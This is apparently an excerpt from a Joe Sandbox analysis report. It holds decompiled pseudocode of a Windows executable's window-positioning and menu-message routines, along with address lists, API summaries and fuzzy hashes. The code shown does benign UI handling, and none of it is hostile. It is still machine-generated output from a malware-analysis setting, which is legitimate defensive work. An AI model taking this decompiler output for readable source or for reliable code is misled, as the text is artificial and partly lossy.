						_t212 = E00453A7C() -  *(_v8 + 0x4c);
						__eflags = _t212;
						_t213 = _t212 >> 1;
						if(_t212 < 0) {
							asm("adc eax, 0x0");
						}
					} else {
						_t255 =  *0x470b40; // 0x0
						_t322 = E00434590( *((intOrPtr*)(_t255 + 0x44))) -  *(_v8 + 0x48);
						_t319 = _t322 >> 1;
						if(_t322 < 0) {
							asm("adc ebx, 0x0");
						}
						_t259 =  *0x470b40; // 0x0
						_t262 = E004345D4( *((intOrPtr*)(_t259 + 0x44))) -  *(_v8 + 0x4c);
						_t213 = _t262 >> 1;
						if(_t262 < 0) {
							asm("adc eax, 0x0");
						}
					}
					if(_t319 < 0) {
						_t319 = 0;
					}
					if(_t213 < 0) {
						_t213 = 0;
					}
					 *((intOrPtr*)( *_v8 + 0x88))( *(_v8 + 0x4c),  *(_v8 + 0x48));
					if( *((char*)(_v8 + 0x57)) != 0) {
						E0044FFF8(_v8);
					}
					goto L59;
				} else {
					_t265 =  *(_v8 + 0x248) & 0x000000ff;
					__eflags = _t265 + 0xfa - 2;
					if(_t265 + 0xfa - 2 >= 0) {
						__eflags = _t265 - 5;
						if(_t265 == 5) {
							_t266 = _v8;
							__eflags =  *((char*)(_t266 + 0x247)) - 1;
							if( *((char*)(_t266 + 0x247)) != 1) {
								_t324 = E00453AB8() -  *(_v8 + 0x48);
								__eflags = _t324;
								_t325 = _t324 >> 1;
								if(_t324 < 0) {
									asm("adc ebx, 0x0");
								}
								_t272 = E00453AAC() -  *(_v8 + 0x4c);
								__eflags = _t272;
								_t273 = _t272 >> 1;
								if(_t272 < 0) {
									asm("adc eax, 0x0");
								}
							} else {
								_t276 =  *0x470b40; // 0x0
								_t328 = E00434590( *((intOrPtr*)(_t276 + 0x44))) -  *(_v8 + 0x48);
								__eflags = _t328;
								_t325 = _t328 >> 1;
								if(_t328 < 0) {
									asm("adc ebx, 0x0");
								}
								_t280 =  *0x470b40; // 0x0
								_t283 = E004345D4( *((intOrPtr*)(_t280 + 0x44))) -  *(_v8 + 0x4c);
								__eflags = _t283;
								_t273 = _t283 >> 1;
								if(_t283 < 0) {
									asm("adc eax, 0x0");
								}
							}
							__eflags = _t325;
							if(_t325 < 0) {
								_t325 = 0;
								__eflags = 0;
							}
							__eflags = _t273;
							if(_t273 < 0) {
								_t273 = 0;
								__eflags = 0;
							}
							 *((intOrPtr*)( *_v8 + 0x88))( *(_v8 + 0x4c),  *(_v8 + 0x48));
						}
					} else {
						_t284 =  *0x470b40; // 0x0
						_t390 =  *(_t284 + 0x44);
						_t285 = _v8;
						__eflags =  *((char*)(_t285 + 0x248)) - 7;
						if( *((char*)(_t285 + 0x248)) == 7) {
							_t382 =  *0x44ae0c; // 0x44ae58
							_t307 = E00403524( *(_v8 + 4), _t382);
							__eflags = _t307;
							if(_t307 != 0) {
								_t390 =  *(_v8 + 4);
							}
						}
						__eflags = _t390;
						if(_t390 == 0) {
							_t330 = E00453A88() -  *(_v8 + 0x48);
							__eflags = _t330;
							_t331 = _t330 >> 1;
							if(_t330 < 0) {
								asm("adc ebx, 0x0");
							}
							_t291 = E00453A7C() -  *(_v8 + 0x4c);
							__eflags = _t291;
							_t292 = _t291 >> 1;
							if(_t291 < 0) {
								asm("adc eax, 0x0");
							}
						} else {
							_t333 = E0044E85C(_t390);
							_t301 =  *((intOrPtr*)(_t390 + 0x48)) -  *(_v8 + 0x48);
							__eflags = _t301;
							_t302 = _t301 >> 1;
							if(_t301 < 0) {
								asm("adc eax, 0x0");
							}
							_t331 = _t333 + _t302;
							_t304 = E0044E87C(_t390);
							_t380 =  *((intOrPtr*)(_t390 + 0x4c)) -  *(_v8 + 0x4c);
							__eflags = _t380;
							_t381 = _t380 >> 1;
							if(_t380 < 0) {
								asm("adc edx, 0x0");
							}
							_t292 = _t304 + _t381;
						}
						__eflags = _t331;
						if(_t331 < 0) {
							_t331 = 0;
							__eflags = 0;
						}
						__eflags = _t292;
						if(_t292 < 0) {
							_t292 = 0;
							__eflags = 0;
						}
						 *((intOrPtr*)( *_v8 + 0x88))( *(_v8 + 0x4c),  *(_v8 + 0x48));
						_t295 = _v8;
						__eflags =  *((char*)(_t295 + 0x57));
						if( *((char*)(_t295 + 0x57)) != 0) {
							E0044FFF8(_v8);
						}
					}
					L59:
					 *(_v8 + 0x248) = 0;
					if( *((char*)(_v8 + 0x247)) != 1) {
						ShowWindow(E0043BA58(_v8),  *(0x46efbc + ( *(_v8 + 0x243) & 0x000000ff) * 4));
					} else {
						if( *(_v8 + 0x243) != 2) {
							ShowWindow(E0043BA58(_v8),  *(0x46efbc + ( *(_v8 + 0x243) & 0x000000ff) * 4));
							_t234 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
							__eflags = _t234;
							CallWindowProcA(0x4065d4, E0043BA58(_v8), 5, 0, _t234);
							E00434DE4();
						} else {
							_t245 = E0043BA58(_v8);
							_t246 =  *0x470b40; // 0x0
							SendMessageA( *( *((intOrPtr*)(_t246 + 0x44)) + 0x26c), 0x223, _t245, 0);
							ShowWindow(E0043BA58(_v8), 3);
						}
						_t240 =  *0x470b40; // 0x0
						SendMessageA( *( *((intOrPtr*)(_t240 + 0x44)) + 0x26c), 0x234, 0, 0);
					}
					goto L82;
				}
			}





























































                                  0x00452099
                                  0x0045209b
                                  0x004520a3
                                  0x004520a6
                                  0x004520ab
                                  0x004520ac
                                  0x004520b1
                                  0x004520b4
                                  0x004520be
                                  0x004520cf
                                  0x004520d4
                                  0x004520e3
                                  0x004520e8
                                  0x004520e8
                                  0x004520ed
                                  0x004520f2
                                  0x004520fa
                                  0x00452103
                                  0x00452104
                                  0x00452109
                                  0x0045210c
                                  0x00452116
                                  0x004525e4
                                  0x004525e7
                                  0x004525eb
                                  0x004525ed
                                  0x004525f0
                                  0x004525f4
                                  0x004525f6
                                  0x004525f9
                                  0x00452600
                                  0x0045260d
                                  0x0045260d
                                  0x00452600
                                  0x004525f4
                                  0x00452612
                                  0x00452614
                                  0x00452617
                                  0x0045261a
                                  0x0045261f
                                  0x00452622
                                  0x00452629
                                  0x00452629
                                  0x0045211c
                                  0x0045211f
                                  0x00452126
                                  0x004524d9
                                  0x004524da
                                  0x004524df
                                  0x004524e2
                                  0x004524ec
                                  0x004524f6
                                  0x00452512
                                  0x0045251a
                                  0x0045251d
                                  0x0045251f
                                  0x00452524
                                  0x00452524
                                  0x00452529
                                  0x0045252c
                                  0x00452533
                                  0x00452545
                                  0x00452548
                                  0x0045254f
                                  0x00452573
                                  0x00452578
                                  0x0045257f
                                  0x00452584
                                  0x00452586
                                  0x00452591
                                  0x00452596
                                  0x00452598
                                  0x004525a7
                                  0x004525a7
                                  0x00452598
                                  0x004525a9
                                  0x004525ab
                                  0x004525dd
                                  0x004525ad
                                  0x004525c5
                                  0x004525cb
                                  0x004525cb
                                  0x00452551
                                  0x00452569
                                  0x00452569
                                  0x00452535
                                  0x0045253a
                                  0x0045253a
                                  0x00000000
                                  0x00452533
                                  0x0045212e
                                  0x0045212f
                                  0x00452134
                                  0x00452137
                                  0x00452141
                                  0x0045214b
                                  0x00452171
                                  0x0045219d
                                  0x004521e6
                                  0x004521e6
                                  0x004521e9
                                  0x004521eb
                                  0x004521ed
                                  0x004521ed
                                  0x004521fd
                                  0x004521fd
                                  0x00452200
                                  0x00452202
                                  0x00452204
                                  0x00452204
                                  0x0045219f
                                  0x0045219f
                                  0x004521b1
                                  0x004521b4
                                  0x004521b6
                                  0x004521b8
                                  0x004521b8
                                  0x004521bb
                                  0x004521cb
                                  0x004521ce
                                  0x004521d0
                                  0x004521d2
                                  0x004521d2
                                  0x004521d0
                                  0x00452209
                                  0x0045220b
                                  0x0045220b
                                  0x0045220f
                                  0x00452211
                                  0x00452211
                                  0x0045222a
                                  0x00452237
                                  0x00452240
                                  0x00452240
                                  0x00000000
                                  0x0045224a
                                  0x0045224d
                                  0x00452259
                                  0x0045225c
                                  0x0045233e
                                  0x00452340
                                  0x00452346
                                  0x00452349
                                  0x00452350
                                  0x00452399
                                  0x00452399
                                  0x0045239c
                                  0x0045239e
                                  0x004523a0
                                  0x004523a0
                                  0x004523b0
                                  0x004523b0
                                  0x004523b3
                                  0x004523b5
                                  0x004523b7
                                  0x004523b7
                                  0x00452352
                                  0x00452352
                                  0x00452364
                                  0x00452364
                                  0x00452367
                                  0x00452369
                                  0x0045236b
                                  0x0045236b
                                  0x0045236e
                                  0x0045237e
                                  0x0045237e
                                  0x00452381
                                  0x00452383
                                  0x00452385
                                  0x00452385
                                  0x00452383
                                  0x004523ba
                                  0x004523bc
                                  0x004523be
                                  0x004523be
                                  0x004523be
                                  0x004523c0
                                  0x004523c2
                                  0x004523c4
                                  0x004523c4
                                  0x004523c4
                                  0x004523dd
                                  0x004523dd
                                  0x00452262
                                  0x00452262
                                  0x00452267
                                  0x0045226a
                                  0x0045226d
                                  0x00452274
                                  0x0045227c
                                  0x00452282
                                  0x00452287
                                  0x00452289
                                  0x0045228e
                                  0x0045228e
                                  0x00452289
                                  0x00452291
                                  0x00452293
                                  0x004522da
                                  0x004522da
                                  0x004522dd
                                  0x004522df
                                  0x004522e1
                                  0x004522e1
                                  0x004522f1
                                  0x004522f1
                                  0x004522f4
                                  0x004522f6
                                  0x004522f8
                                  0x004522f8
                                  0x00452295
                                  0x0045229c
                                  0x004522a4
                                  0x004522a4
                                  0x004522a7
                                  0x004522a9
                                  0x004522ab
                                  0x004522ab
                                  0x004522ae
                                  0x004522b2
                                  0x004522bd
                                  0x004522bd
                                  0x004522c0
                                  0x004522c2
                                  0x004522c4
                                  0x004522c4
                                  0x004522c7
                                  0x004522c7
                                  0x004522fb
                                  0x004522fd
                                  0x004522ff
                                  0x004522ff
                                  0x004522ff
                                  0x00452301
                                  0x00452303
                                  0x00452305
                                  0x00452305
                                  0x00452305
                                  0x0045231e
                                  0x00452324
                                  0x00452327
                                  0x0045232b
                                  0x00452334
                                  0x00452334
                                  0x0045232b
                                  0x004523e3
                                  0x004523e6
                                  0x004523f7
                                  0x004524cd
                                  0x004523fd
                                  0x00452407
                                  0x0045245a
                                  0x0045246e
                                  0x0045246e
                                  0x00452483
                                  0x0045248b
                                  0x00452409
                                  0x0045240e
                                  0x00452419
                                  0x00452428
                                  0x00452438
                                  0x00452438
                                  0x00452499
                                  0x004524a8
                                  0x004524a8
                                  0x00000000
                                  0x004523f7

                                  APIs
                                  • SendMessageA.USER32(?,00000223,00000000,00000000), ref: 00452428
                                    • Part of subcall function 00405C70: LoadStringA.USER32 ref: 00405CA2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: LoadMessageSendString
                                  • String ID:
                                  • API String ID: 1946433856-0
                                  • Opcode ID: 7c5c005350a2a5bd02e0dae1c8119e4847148a6960de5ef6528fd61460ad4d71
                                  • Instruction ID: 813a3057853abde8937bc2d61ebf96f65d47f8dbd33b838144ad4d21810eefc1
                                  • Opcode Fuzzy Hash: 7c5c005350a2a5bd02e0dae1c8119e4847148a6960de5ef6528fd61460ad4d71
                                  • Instruction Fuzzy Hash: F2F16134A00644EFD700DBA9CA85B9D77F4AB05305F2440A6FA44EB3A3D7B8EE45DB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043BD64, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E0043BD64(void* __eax) {
				void* _v28;
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				void* _t43;
				struct HWND__* _t45;
				struct tagPOINT* _t47;

				_t47 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0x188)) == 0) {
					GetWindowRect( *(_t43 + 0x188), _t47);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0x188),  &_v56);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t43 + 0x188), 0xfffffff0) & 0x40000000) != 0) {
					_t45 = GetWindowLongA( *(_t43 + 0x188), 0xfffffff8);
					if(_t45 != 0) {
						ScreenToClient(_t45, _t47);
						ScreenToClient(_t45,  &_v64);
					}
				}
				 *(_t43 + 0x40) = _t47->x;
				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
				return E004341BC(_t43);
			}










                                  0x0043bd67
                                  0x0043bd6a
                                  0x0043bd7a
                                  0x0043bda9
                                  0x0043bd7c
                                  0x0043bd7c
                                  0x0043bd90
                                  0x0043bd9b
                                  0x0043bd9c
                                  0x0043bd9d
                                  0x0043bd9e
                                  0x0043bd9e
                                  0x0043bdc1
                                  0x0043bdd1
                                  0x0043bdd5
                                  0x0043bdd9
                                  0x0043bde4
                                  0x0043bde4
                                  0x0043bdd5
                                  0x0043bdec
                                  0x0043bdf3
                                  0x0043bdfd
                                  0x0043be08
                                  0x0043be18

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$ClientLongScreen$IconicPlacementRect
                                  • String ID: ,
                                  • API String ID: 2266315723-3772416878
                                  • Opcode ID: 0056543ba3a9f264186b254670aa887d9c75c2b9b33c110290d12ee4075cf235
                                  • Instruction ID: 5985a99f6a37a5f65777e8b544df51ad7d09521af5a52025bbe2b042f6b38b10
                                  • Opcode Fuzzy Hash: 0056543ba3a9f264186b254670aa887d9c75c2b9b33c110290d12ee4075cf235
                                  • Instruction Fuzzy Hash: 08116371505200AFCB40EF6DC885E8B77D8AF49314F05493EBE58DB286DB39D9008BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00449828, Relevance: 10.9, APIs: 7, Instructions: 405nativeCOMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E00449828(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				signed int _v16;
				signed int _v17;
				intOrPtr _v24;
				int _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr _t137;
				signed int _t138;
				intOrPtr _t144;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t153;
				void* _t158;
				struct HMENU__* _t160;
				intOrPtr* _t165;
				void* _t173;
				signed int _t177;
				signed int _t181;
				void* _t182;
				void* _t214;
				struct HDC__* _t221;
				void* _t251;
				signed int _t257;
				void* _t265;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t290;
				signed int _t291;
				intOrPtr _t311;
				intOrPtr _t333;
				intOrPtr _t342;
				intOrPtr _t346;
				intOrPtr* _t353;
				signed int _t355;
				intOrPtr* _t356;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				intOrPtr* _t375;
				void* _t377;
				void* _t378;
				intOrPtr _t379;
				void* _t380;

				_t377 = _t378;
				_t379 = _t378 + 0xffffffd0;
				_v52 = 0;
				_t375 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x449d5c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t379;
				_t137 =  *__edx;
				_t380 = _t137 - 0x111;
				if(_t380 > 0) {
					_t138 = _t137 - 0x117;
					__eflags = _t138;
					if(_t138 == 0) {
						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t271;
						if(_t271 < 0) {
							goto L67;
						} else {
							_t272 = _t271 + 1;
							_t367 = 0;
							__eflags = 0;
							while(1) {
								_t150 = E00448978(E00413D2C(_v8, _t367),  *(_t375 + 4), __eflags);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L68;
								}
								_t367 = _t367 + 1;
								_t272 = _t272 - 1;
								__eflags = _t272;
								if(_t272 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
					} else {
						_t151 = _t138 - 8;
						__eflags = _t151;
						if(_t151 == 0) {
							_v17 = 0;
							__eflags =  *(__edx + 6) & 0x00000010;
							if(( *(__edx + 6) & 0x00000010) != 0) {
								_v17 = 1;
							}
							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t274;
							if(__eflags < 0) {
								L32:
								_t153 =  *0x46fc50; // 0x470b40
								E00456ECC( *_t153, 0, __eflags);
								goto L67;
							} else {
								_t275 = _t274 + 1;
								_t368 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _v17 - 1;
									if(_v17 != 1) {
										_v12 =  *(_t375 + 4) & 0x0000ffff;
									} else {
										_t160 =  *(_t375 + 8);
										__eflags = _t160;
										if(_t160 == 0) {
											_v12 = 0xffffffff;
										} else {
											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
										}
									}
									_t158 = E00413D2C(_v8, _t368);
									_t295 = _v17 & 0x000000ff;
									_v16 = E004488BC(_t158, _v17 & 0x000000ff, _v12);
									__eflags = _v16;
									if(__eflags != 0) {
										break;
									}
									_t368 = _t368 + 1;
									_t275 = _t275 - 1;
									__eflags = _t275;
									if(__eflags != 0) {
										continue;
									} else {
										goto L32;
									}
									goto L68;
								}
								E00431B28( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
								_t165 =  *0x46fc50; // 0x470b40
								E00456ECC( *_t165, _v52, __eflags);
							}
						} else {
							__eflags = _t151 == 1;
							if(_t151 == 1) {
								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t277;
								if(_t277 < 0) {
									goto L67;
								} else {
									_t278 = _t277 + 1;
									_t369 = 0;
									__eflags = 0;
									while(1) {
										_v48 = E00413D2C(_v8, _t369);
										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
										__eflags = _t173 -  *(_t375 + 8);
										if(_t173 ==  *(_t375 + 8)) {
											break;
										}
										_t177 = E004488BC(_v48, 1,  *(_t375 + 8));
										__eflags = _t177;
										if(_t177 == 0) {
											_t369 = _t369 + 1;
											_t278 = _t278 - 1;
											__eflags = _t278;
											if(_t278 != 0) {
												continue;
											} else {
												goto L67;
											}
										} else {
											break;
										}
										goto L68;
									}
									E00449408(_v48, _t375);
								}
							} else {
								goto L67;
							}
						}
					}
					goto L68;
				} else {
					if(_t380 == 0) {
						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t280;
						if(_t280 < 0) {
							goto L67;
						} else {
							_t281 = _t280 + 1;
							_t370 = 0;
							__eflags = 0;
							while(1) {
								E00413D2C(_v8, _t370);
								_t181 = E0044895C( *(_t375 + 4) & 0x0000ffff, __eflags);
								__eflags = _t181;
								if(_t181 != 0) {
									goto L68;
								}
								_t370 = _t370 + 1;
								_t281 = _t281 - 1;
								__eflags = _t281;
								if(_t281 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
						goto L68;
					} else {
						_t182 = _t137 - 0x2b;
						if(_t182 == 0) {
							_v40 =  *((intOrPtr*)(__edx + 8));
							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t283;
							if(_t283 < 0) {
								goto L67;
							} else {
								_t284 = _t283 + 1;
								_t371 = 0;
								__eflags = 0;
								while(1) {
									_v16 = E004488BC(E00413D2C(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
									__eflags = _v16;
									if(_v16 != 0) {
										break;
									}
									_t371 = _t371 + 1;
									_t284 = _t284 - 1;
									__eflags = _t284;
									if(_t284 != 0) {
										continue;
									} else {
										goto L67;
									}
									goto L69;
								}
								_v24 = E0041DFC8(0, 1);
								_push(_t377);
								_push(0x449b8f);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								_v28 = SaveDC( *(_v40 + 0x18));
								_push(_t377);
								_push(0x449b72);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								E0041E958(_v24,  *(_v40 + 0x18));
								E0041E7EC(_v24);
								E0044A020(_v16, _v40 + 0x1c, _v24,  *(_v40 + 0x10) & 0x0000ffff);
								_pop(_t333);
								 *[fs:eax] = _t333;
								_push(0x449b79);
								__eflags = 0;
								E0041E958(_v24, 0);
								return RestoreDC( *(_v40 + 0x18), _v28);
							}
						} else {
							_t214 = _t182 - 1;
							if(_t214 == 0) {
								_v44 =  *((intOrPtr*)(__edx + 8));
								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t286;
								if(_t286 < 0) {
									goto L67;
								} else {
									_t287 = _t286 + 1;
									_t372 = 0;
									__eflags = 0;
									while(1) {
										_v16 = E004488BC(E00413D2C(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v16;
										if(_v16 != 0) {
											break;
										}
										_t372 = _t372 + 1;
										_t287 = _t287 - 1;
										__eflags = _t287;
										if(_t287 != 0) {
											continue;
										} else {
											goto L67;
										}
										goto L69;
									}
									_t221 =  *((intOrPtr*)(_v8 + 0x10));
									L004067EC();
									_v32 = _t221;
									 *[fs:eax] = _t379;
									_v24 = E0041DFC8(0, 1);
									 *[fs:eax] = _t379;
									_v28 = SaveDC(_v32);
									 *[fs:eax] = _t379;
									E0041E958(_v24, _v32);
									E0041E7EC(_v24);
									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x449c90, _t377,  *[fs:eax], 0x449cad, _t377,  *[fs:eax], 0x449cd2, _t377, _t221);
									_pop(_t342);
									 *[fs:eax] = _t342;
									_push(0x449c97);
									__eflags = 0;
									E0041E958(_v24, 0);
									return RestoreDC(_v32, _v28);
								}
							} else {
								if(_t214 == 0x27) {
									_v36 =  *((intOrPtr*)(__edx + 8));
									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
									__eflags = _t290;
									if(_t290 < 0) {
										goto L67;
									} else {
										_t291 = _t290 + 1;
										_t373 = 0;
										__eflags = 0;
										while(1) {
											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E00413D2C(_v8, _t373))) + 0x34))();
											_t346 = _v36;
											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
												_v16 = E004488BC(E00413D2C(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
											} else {
												_v16 =  *((intOrPtr*)(E00413D2C(_v8, _t373) + 0x34));
											}
											__eflags = _v16;
											if(_v16 != 0) {
												break;
											}
											_t373 = _t373 + 1;
											_t291 = _t291 - 1;
											__eflags = _t291;
											if(_t291 != 0) {
												continue;
											} else {
												goto L67;
											}
											goto L68;
										}
										_t257 = E004488EC(E00413D2C(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
										__eflags = _t257;
										if(_t257 == 0) {
											_t265 = E00413D2C(_v8, _t373);
											__eflags = 0;
											_t257 = E004488EC(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
										}
										_t353 =  *0x46fda0; // 0x470b44
										_t355 =  *( *_t353 + 0x6c);
										__eflags = _t355;
										if(_t355 != 0) {
											__eflags = _t257;
											if(_t257 == 0) {
												_t257 =  *(_t355 + 0x160);
											}
											__eflags =  *(_t355 + 0x240) & 0x00000008;
											if(( *(_t355 + 0x240) & 0x00000008) == 0) {
												_t356 =  *0x46fc50; // 0x470b40
												E00456AA8( *_t356, _t291, _t257, _t373, _t375);
											} else {
												E00456B34();
											}
										}
									}
								} else {
									L67:
									_push( *(_t375 + 8));
									_push( *(_t375 + 4));
									_push( *_t375);
									_t144 =  *((intOrPtr*)(_v8 + 0x10));
									_push(_t144);
									L004065DC();
									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
								}
								L68:
								_pop(_t311);
								 *[fs:eax] = _t311;
								_push(0x449d63);
								return E0040411C( &_v52);
							}
						}
					}
				}
				L69:
			}


































































                                  0x00449829
                                  0x0044982b
                                  0x00449833
                                  0x00449836
                                  0x00449838
                                  0x0044983d
                                  0x0044983e
                                  0x00449843
                                  0x00449846
                                  0x00449849
                                  0x0044984b
                                  0x00449850
                                  0x00449872
                                  0x00449872
                                  0x00449877
                                  0x004498c6
                                  0x004498c7
                                  0x004498c9
                                  0x00000000
                                  0x004498cf
                                  0x004498cf
                                  0x004498d0
                                  0x004498d0
                                  0x004498d2
                                  0x004498df
                                  0x004498e4
                                  0x004498e6
                                  0x00000000
                                  0x00000000
                                  0x004498ec
                                  0x004498ed
                                  0x004498ed
                                  0x004498ee
                                  0x00000000
                                  0x004498f0
                                  0x00000000
                                  0x004498f0
                                  0x00000000
                                  0x004498ee
                                  0x004498d2
                                  0x00449879
                                  0x00449879
                                  0x00449879
                                  0x0044987c
                                  0x004498f5
                                  0x004498f9
                                  0x004498fd
                                  0x004498ff
                                  0x004498ff
                                  0x00449909
                                  0x0044990a
                                  0x0044990c
                                  0x00449983
                                  0x00449983
                                  0x0044998c
                                  0x00000000
                                  0x0044990e
                                  0x0044990e
                                  0x0044990f
                                  0x0044990f
                                  0x00449911
                                  0x00449911
                                  0x00449915
                                  0x0044993b
                                  0x00449917
                                  0x00449917
                                  0x0044991a
                                  0x0044991c
                                  0x0044992e
                                  0x0044991e
                                  0x00449929
                                  0x00449929
                                  0x0044991c
                                  0x00449943
                                  0x00449948
                                  0x00449954
                                  0x00449957
                                  0x0044995b
                                  0x00000000
                                  0x00000000
                                  0x0044997f
                                  0x00449980
                                  0x00449980
                                  0x00449981
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00449981
                                  0x00449966
                                  0x0044996e
                                  0x00449975
                                  0x00449975
                                  0x0044987e
                                  0x0044987e
                                  0x0044987f
                                  0x00449ce9
                                  0x00449cea
                                  0x00449cec
                                  0x00000000
                                  0x00449cee
                                  0x00449cee
                                  0x00449cef
                                  0x00449cef
                                  0x00449cf1
                                  0x00449cfb
                                  0x00449d03
                                  0x00449d06
                                  0x00449d09
                                  0x00000000
                                  0x00000000
                                  0x00449d13
                                  0x00449d18
                                  0x00449d1a
                                  0x00449d28
                                  0x00449d29
                                  0x00449d29
                                  0x00449d2a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00449d1a
                                  0x00449d21
                                  0x00449d21
                                  0x00449885
                                  0x00000000
                                  0x00449885
                                  0x0044987f
                                  0x0044987c
                                  0x00000000
                                  0x00449852
                                  0x00449852
                                  0x00449890
                                  0x00449891
                                  0x00449893
                                  0x00000000
                                  0x00449899
                                  0x00449899
                                  0x0044989a
                                  0x0044989a
                                  0x0044989c
                                  0x004498a1
                                  0x004498aa
                                  0x004498af
                                  0x004498b1
                                  0x00000000
                                  0x00000000
                                  0x004498b7
                                  0x004498b8
                                  0x004498b8
                                  0x004498b9
                                  0x00000000
                                  0x004498bb
                                  0x00000000
                                  0x004498bb
                                  0x00000000
                                  0x004498b9
                                  0x0044989c
                                  0x00000000
                                  0x00449854
                                  0x00449854
                                  0x00449857
                                  0x00449a9b
                                  0x00449aa4
                                  0x00449aa5
                                  0x00449aa7
                                  0x00000000
                                  0x00449aad
                                  0x00449aad
                                  0x00449aae
                                  0x00449aae
                                  0x00449ab0
                                  0x00449ac7
                                  0x00449aca
                                  0x00449ace
                                  0x00000000
                                  0x00000000
                                  0x00449b96
                                  0x00449b97
                                  0x00449b97
                                  0x00449b98
                                  0x00000000
                                  0x00449b9e
                                  0x00000000
                                  0x00449b9e
                                  0x00000000
                                  0x00449b98
                                  0x00449ae0
                                  0x00449ae5
                                  0x00449ae6
                                  0x00449aeb
                                  0x00449aee
                                  0x00449afd
                                  0x00449b02
                                  0x00449b03
                                  0x00449b08
                                  0x00449b0b
                                  0x00449b17
                                  0x00449b2c
                                  0x00449b45
                                  0x00449b4c
                                  0x00449b4f
                                  0x00449b52
                                  0x00449b57
                                  0x00449b5c
                                  0x00449b71
                                  0x00449b71
                                  0x0044985d
                                  0x0044985d
                                  0x0044985e
                                  0x00449ba6
                                  0x00449baf
                                  0x00449bb0
                                  0x00449bb2
                                  0x00000000
                                  0x00449bb8
                                  0x00449bb8
                                  0x00449bb9
                                  0x00449bb9
                                  0x00449bbb
                                  0x00449bd2
                                  0x00449bd5
                                  0x00449bd9
                                  0x00000000
                                  0x00000000
                                  0x00449cd9
                                  0x00449cda
                                  0x00449cda
                                  0x00449cdb
                                  0x00000000
                                  0x00449ce1
                                  0x00000000
                                  0x00449ce1
                                  0x00000000
                                  0x00449cdb
                                  0x00449be2
                                  0x00449be6
                                  0x00449beb
                                  0x00449bf9
